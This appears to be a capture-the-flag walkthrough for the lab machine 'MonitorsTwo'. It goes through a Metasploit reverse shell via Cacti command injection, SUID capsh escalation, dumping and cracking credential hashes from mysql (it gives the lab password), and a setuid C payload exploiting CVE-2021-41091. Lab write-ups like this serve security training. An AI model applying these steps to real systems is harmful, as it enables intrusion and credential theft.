MonitorsTwo

1. Initial recon

1.1. nmap

nmap -sC -sV 10.10.11.211

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2. nikto

nikto -host 10.10.11.211

+ Server: nginx/1.18.0 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/7.4.33.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /install/install.php: Install file found.
+ /help.php: A help file was found.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.

1.3. website recon

while nikto gave us some very interesting output, simply googling the software presented on the web application Cacti 1.2.22 we'll find that there's a metasploit exploit for it.

1.4. msfconsole

in msfconsole run search cacti and then use 0 (exploit/linux/http/cacti_unauthenticated_cmd_injection)

for the options we want

set rport 80
set rhost 10.10.11.211
set target 0
set lhost YOUR_IP

then exploit

now we have a reverse shell as the user www-data. if you don't get a shell the first time keep trying until you do.

1.5. root?

we can find SUID biaries using the following command find / -type f -perm -04000 -ls 2>/dev/null

from the output we can see that the SUID bit is set for the binary /sbin/capsh, using GTFOBins we are able to escalate our privileges to root using the command /sbin/capsh --gid=0 --uid=0 -- but when we look in /root there's nothing there... hmm

2. user.txt

As root we are able to run the script in the root directory entrypoint.sh

from that script we can then reset the admin user password using mysql mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET password=md5('admin') where username='admin'"

now we are able to login to the web application as the user admin

from there we can look at the configuration and find the username marcus

2.1. mysql

taking more inspriation from entrypoint.sh we can run the following mysql commands to leak some credentials

mysql --host=db --user=root --password=root cacti -e 'show tables' this will reveal to us the different tables that are stored in the mysql database

mysql --host=db --user=root --password=root cacti -e 'select * from user_auth' and this will reveal to us all the entries in the table user_auth which contains some credentials

copy hash of the password of the user marcus and use johntheripper to crack the hash $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

finally we will have some credentials for the user markus:funkymonkey

ssh into the machine with credentials but keep your metasploit shell open too as we will need that for the root flag.

user.txt can be found in /home/marcus

3. root.txt

after some enumeration of the file system we find an email in /var/mail/marcus which talks about CVE-2021-41091

looking up this CVE we can find a proof of concept on Cyberark

To recreate this proof of concept for this machine:

• run findmnt in the marcus terminal

  • here we will find the path for the docker container where we have root, located at /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged so move into that directory

• now in the root terminal create the following c file

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main() {

    setuid(0);
    setgid(0);

    system("/bin/bash");

    return 0;
}

then we need to compile it with gcc gcc payload.c -o payload and then set the capabilities of this binary setcap cap_setgid,cap_setuid+eip lol

• back in the marcus terminal simply run the binary with ./payload and we are root!

root.txt can be found in /root